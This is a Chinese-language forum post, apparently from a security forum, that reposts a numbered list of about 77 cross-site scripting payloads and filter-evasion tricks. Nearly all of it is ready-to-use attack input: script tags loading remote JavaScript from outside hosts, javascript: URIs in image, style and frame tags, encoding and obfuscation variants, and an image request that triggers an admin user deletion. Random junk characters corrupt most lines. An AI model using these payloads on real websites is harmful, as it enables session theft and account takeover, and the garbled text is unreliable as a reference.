貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。3 {2 I8 R( j0 _- O
(1)普通的XSS JavaScript注入' N$ ]1 S- J7 y. l, M8 \7 _0 B
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. ~9 V+ X5 j7 w(2)IMG标签XSS使用JavaScript命令
$ R8 H! W( L; w<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 y3 @+ F2 q K(3)IMG标签无分号无引号
* [7 G7 K& G: [* d0 H. B- G: k9 Y<IMG SRC=javascript:alert(‘XSS’)>
: }+ Q, g# C" V1 ~; d* M5 L& h(4)IMG标签大小写不敏感
. j. R& c1 r7 I<IMG SRC=JaVaScRiPt:alert(‘XSS’)>% r' g5 K1 s% x1 |" `& T
(5)HTML编码(必须有分号)! c' ^$ E+ b8 ^, N) n2 o8 a* v6 B
<IMG SRC=javascript:alert(“XSS”)># u( e# r' _+ v3 X7 X
(6)修正缺陷IMG标签
( |) Z" m4 J3 p- M) K<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
7 r, [5 e5 n' Q( B8 C ^1 v
* b9 |3 v4 j! _. m& j% @) Z* t w% I' C" H! _
(7)formCharCode标签(计算器)0 N1 e. y) m7 r& g' F& Q
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>1 K+ S: e& e: _2 c5 t6 _" w
(8)UTF-8的Unicode编码(计算器)& W( m0 Q2 U& {* Y. e
<IMG SRC=jav..省略..S')>0 t! E; P7 i' O
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)% D1 b A( m) N) M
<IMG SRC=jav..省略..S')>+ @$ z+ L; }* b7 ^, C4 F, w" F
(10)十六进制编码也是没有分号(计算器)
3 h. k6 `& d' U3 C<IMG SRC=java..省略..XSS')>
/ ~( Q# ^0 A2 J. ^8 I(11)嵌入式标签,将Javascript分开
Y" ?# d7 |. F2 D6 _$ M* K7 Z<IMG SRC=”jav ascript:alert(‘XSS’);”>
' q: M! n, B& B. X$ Y+ P# v" }. k(12)嵌入式编码标签,将Javascript分开2 x! M3 d- `, h2 ]: g% _8 W/ B
<IMG SRC=”jav ascript:alert(‘XSS’);”>' s0 I+ W0 Z J) y, ?$ m
(13)嵌入式换行符
. z4 G0 q7 A/ Q) e5 j<IMG SRC=”jav ascript:alert(‘XSS’);”>* r7 L3 h8 r$ b& ?9 ^4 a
(14)嵌入式回车$ B7 M! M% _2 R( x# t/ h" k
<IMG SRC=”jav ascript:alert(‘XSS’);”>; l9 i6 k7 y% w
(15)嵌入式多行注入JavaScript,这是XSS极端的例子/ S& Q# @. }: i( }" O$ Z
<IMG SRC=”javascript:alert(‘XSS‘)”>
: r0 u! a: C* Y/ D4 R, K(16)解决限制字符(要求同页面)
& I" O j, s T( _. c% T1 j, W<script>z=’document.’</script>
2 H3 j. ~2 F1 y7 d4 ?<script>z=z+’write(“‘</script>4 V, H# l3 r' @1 i0 S4 r
<script>z=z+’<script’</script>
( q* L- m6 Z4 {2 e) Q<script>z=z+’ src=ht’</script>
+ L, L" l9 x3 L- s2 a6 D: _; N6 z<script>z=z+’tp://ww’</script>$ c' J* C" W; y, G* O
<script>z=z+’w.shell’</script>, r4 a4 P$ p: M+ f* \- t
<script>z=z+’.net/1.’</script>
, J a) V* t: I$ l5 T<script>z=z+’js></sc’</script>- L9 H) O1 g1 T$ E- l
<script>z=z+’ript>”)’</script>" t, u5 g. a9 T: L$ w5 z6 X
<script>eval_r(z)</script>
9 J% U$ v& z8 n( n0 e% z7 E(17)空字符12-7-1 T00LS - Powered by Discuz! Board
$ @3 k& m- ]) O" z8 `6 R/ B- c) Fhttps://www.t00ls.net/viewthread ... table&tid=15267 2/65 t* [2 U( q7 H' T9 U9 A, h
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 |( W. F" W+ ?0 T9 x
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
$ e! B! |+ [' Z! V1 Xperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out" `9 j g7 Q% U
(19)Spaces和meta前的IMG标签1 e! s' X# S t0 y% [
<IMG SRC=” javascript:alert(‘XSS’);”>: a. o3 X" D: S% M B) \% x, B- a
(20)Non-alpha-non-digit XSS. M& ~! e9 N- y: u( Z$ e
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>7 _7 Q ^; _/ c T
(21)Non-alpha-non-digit XSS to 2
% j, R' c% u/ H4 D4 _+ d<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>8 b+ U/ o3 w6 \
(22)Non-alpha-non-digit XSS to 3# T+ D$ _& X0 O( l9 ?- Y) D. ^9 J
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
9 i p1 V9 w+ t1 R7 m/ u(23)双开括号7 e, g. I6 F. y( e* g4 j
<<SCRIPT>alert(“XSS”);//<</SCRIPT>* d, ^0 O9 P, J/ P6 T4 {
(24)无结束脚本标记(仅火狐等浏览器)
3 R4 ?7 H- f% b2 \<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
2 @: p1 E3 S' B8 {$ `(25)无结束脚本标记2 s- M; H8 l* y7 {* v }
<SCRIPT SRC=//3w.org/XSS/xss.js>: L" B! Q4 a; x. z- e: T0 e
(26)半开的HTML/JavaScript XSS; A7 h& ?( \. z% g% Z4 i1 Q
<IMG SRC=”javascript:alert(‘XSS’)”" K: j5 @+ i6 q! M4 w2 k- d
(27)双开角括号
4 n4 Y& Z2 K- Q6 N- `# h<iframe src=http://3w.org/XSS.html <
1 j- {- |( v# A" t8 Z0 N5 J- ^(28)无单引号 双引号 分号4 \1 q$ L3 w9 U! @5 ^2 u L4 e
<SCRIPT>a=/XSS/) \0 z% G2 _. ?
alert(a.source)</SCRIPT>1 O2 H5 ^% ^: G4 I
(29)换码过滤的JavaScript% I- z$ u0 L/ m K* n' d
\”;alert(‘XSS’);//
4 d9 T" ]' M! b9 o3 T(30)结束Title标签$ J( O7 s% O0 Y8 x
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
; M2 j6 G1 Z ?2 x5 O ^(31)Input Image# O' ]8 Y- N+ V( u0 X
<INPUT SRC=”javascript:alert(‘XSS’);”>" ]* b \) \8 Q) o% n
(32)BODY Image* y: a1 E) e$ |( E
<BODY BACKGROUND=”javascript:alert(‘XSS’)”> Q7 g' Z I- w! I
(33)BODY标签- ^% I+ A! A8 S/ `% R* @4 [6 }
<BODY(‘XSS’)>
. y2 g! w; e2 p* q7 Q" M& C(34)IMG Dynsrc
) C' k7 }% x* g$ U<IMG DYNSRC=”javascript:alert(‘XSS’)”>! Y- }* m: {2 d5 V8 W0 U2 ~* X, q
(35)IMG Lowsrc
( q3 A1 m. J, y C; o' c<IMG LOWSRC=”javascript:alert(‘XSS’)”>
@: [# U5 T* {. {2 i6 H' _(36)BGSOUND
7 z# T) [6 ?/ X7 b# d+ G' y<BGSOUND SRC=”javascript:alert(‘XSS’);”>
. E* J8 ` J- Z! S! K2 _; Q, s8 }(37)STYLE sheet! W, v8 S$ |4 \1 T& ~ _: n
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
, f" U* c: i) Z0 D; I(38)远程样式表) q; R! E8 F% b( d9 ]: v- r
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
. I; t) |8 K0 F. B t(39)List-style-image(列表式)
5 h2 ~+ e3 k% Z<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
# f8 A7 i% e7 \9 m$ {' x1 L9 E7 B(40)IMG VBscript: Y4 {8 t+ _$ C% E' T
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS6 i! ^0 }0 F8 W9 _3 w
(41)META链接url$ ]0 S9 G( F* x: \3 e# O
" n$ n& k" A% S( [
G0 K) y. k D- i& ]4 d7 C
<META HTTP-EQUIV=”refresh” CONTENT=”0;4 U+ M" f6 k# N2 j h8 w
URL=http://;URL=javascript:alert(‘XSS’);”>
+ r3 I" M* {$ q& X, n/ q(42)Iframe1 }+ J, T5 Q2 r/ \5 G3 X! U
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
+ t# K& g( ~5 O: H; z! u# {+ v(43)Frame6 I# u& d2 e/ I9 Z9 e$ H4 I J
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
8 t8 I$ ] U/ R" ?, d+ bhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6# N, g; B9 O. _6 i+ O
(44)Table9 F6 J6 S% j; X9 b
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
6 w! P1 D6 X4 x# b(45)TD
, H" E" ~! f0 {, j5 Z/ ~<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
' v' _2 P: d. V4 d4 n(46)DIV background-image) _" u0 `: l' X2 G; `
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> H$ P0 Y% g2 T0 [# f
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
4 I5 T- t4 P4 g* e% ]8&13&12288&65279)+ c" w& f) B; V9 ~4 L! Z3 |& [
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 ?. ]8 u& [9 R" ^/ _# T+ l
(48)DIV expression" Q" V0 K- m5 X
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
* M! Z E0 L0 D# X* E+ J(49)STYLE属性分拆表达" ]+ f) b/ f7 k" C: C: t' p4 e
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>2 _3 T z( w7 P y. p, x
(50)匿名STYLE(组成:开角号和一个字母开头)
* H T. v4 \, Y9 r* G" A<XSS STYLE=”xss:expression_r(alert(‘XSS’))”># o; O f% C0 m& X
(51)STYLE background-image
6 v" Y% J" ~+ @: H! x<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A) M" m* r# A: K% K7 Y0 C
CLASS=XSS></A>
7 E9 w" n2 T2 n% F- `(52)IMG STYLE方式
- O7 \7 M, M9 h' x7 b% Qexppression(alert(“XSS”))’>
6 f0 G9 G) z0 _; z* g3 t(53)STYLE background4 v6 n" I( _: T1 ]% i" R% Z8 [
<STYLE><STYLE
2 P; u2 @9 n' J! i; ntype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>/ k4 h3 d/ A& e6 A& G$ u3 I+ j. x7 T9 j
(54)BASE5 I M6 b7 g+ r3 g% M$ i
<BASE HREF=”javascript:alert(‘XSS’);//”>* P4 T7 v% N& I8 V% F- l; t! ?7 @
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
- Z) A4 d- H+ U# [9 p<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>8 w! a& C' G* C) w7 g- V
(56)在flash中使用ActionScrpt可以混进你XSS的代码
9 \/ p% P/ l- W4 O9 V/ O6 S0 }3 ca=”get”;
3 { s7 v3 O. n3 S( }( Db=”URL(\”";' v+ k3 b. C) h; @
c=”javascript:”;* A) ^2 i( u9 V! I2 S" z- f
d=”alert(‘XSS’);\”)”;! T5 w7 \4 n& v# _/ j, e K
eval_r(a+b+c+d);" s& E5 I5 z6 g' F6 V
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
0 B0 A( @- z7 w( U* j* a. D<HTML xmlns:xss>4 _5 v* n1 k1 q, l3 P5 F7 {( x
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
3 g* E- v) `. x: Y9 L* K<xss:xss>XSS</xss:xss>
' F( P' ~2 I! ]- P2 O( p# S" A2 E</HTML>5 x* a1 R' W$ Q1 E- q
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
- ^& `2 S: i7 L% x0 z# h<SCRIPT SRC=””></SCRIPT>$ [6 p; T, E! t) z; ?9 t4 S. X
(59)IMG嵌入式命令,可执行任意命令
" u, \5 Y* |, ^2 x/ s<IMG SRC=”http://www.XXX.com/a.php?a=b”>
" q' w# a3 f& i7 x) O; n(60)IMG嵌入式命令(a.jpg在同服务器)
6 J5 f6 y; k ZRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser4 o: r) e' M a* f; u4 ]
(61)绕符号过滤
3 l/ Y0 w. }+ x: l D" t' [1 G<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT># b6 @2 @) [) c/ r$ a' {, B
(62)
0 N- k# b2 n" |4 ^; |' j' C; o c<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 C' z+ y7 j" D(63)
' q+ V- b1 a$ t& ^<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
' a, Y. r. R% y(64)
. t# C' Z" K4 Q: H3 x<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>3 m0 u0 x! I, s( J3 B. o- E
(65)) V% o9 O) J" N/ k, X% s
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
" ?& p' V- S" P- S$ r$ `+ `9 ](66)12-7-1 T00LS - Powered by Discuz! Board
8 _* d( D" G0 bhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
e2 e- E- L7 P* Y0 l5 X<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
. c7 d% n5 ~2 V) I(67)( k0 O% \2 ]- `3 V8 J' y
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>3 D: B, a( h$ [% J
</SCRIPT>
6 `: f# r X ?0 g* p/ T(68)URL绕行2 e* j5 Y, G l
<A HREF=”http://127.0.0.1/”>XSS</A>7 T$ `: J& [. W H2 D
(69)URL编码! k" Q7 c$ h d! o
<A HREF=”http://3w.org”>XSS</A>5 N' ^0 k3 f! a' O. L
(70)IP十进制
9 d8 i6 Y; Y8 r6 K# j5 f<A HREF=”http://3232235521″>XSS</A>
: ], g: q- r" t& k9 w h9 R(71)IP十六进制
) K$ z- Y7 o1 e; @3 n1 s4 Q<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
! U! A# m: A: M$ C& U: P4 T(72)IP八进制
8 y' H8 z0 Z6 A<A HREF=”http://0300.0250.0000.0001″>XSS</A>
3 r- H' X) l- p e(73)混合编码
) \0 ?5 _/ w9 I, h1 K/ ^7 }' |<A HREF=”h
4 C: b. d! n2 D5 t2 ~2 @' ] g3 \' gtt p://6 6.000146.0×7.147/”">XSS</A>
% g! e0 ]3 u( W; N1 O, L" A" \- A(74)节省[http:]. S2 q, n0 ]( V% L) P$ J1 Y7 I
<A HREF=”//www.google.com/”>XSS</A>
# Z7 ?% k3 c m' P6 Y- V(75)节省[www]; T6 |2 U) b" m( ~4 \
<A HREF=”http://google.com/”>XSS</A>
/ u9 S, U- F3 w! r2 E7 A(76)绝对点绝对DNS1 m7 O+ c1 t* Q. Q2 ^2 S8 K
<A HREF=”http://www.google.com./”>XSS</A>1 Y: @, c6 E& Q, D
(77)javascript链接8 s$ q0 {2 d) v4 ?0 N
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
- F- A- h7 m% {0 `2 a" c- g* D/ k8 N& ]9 f w
原文地址:http://fuzzexp.org/u/0day/?p=14# v6 w# e! G0 e& ^
) w* d4 W8 D' s" w |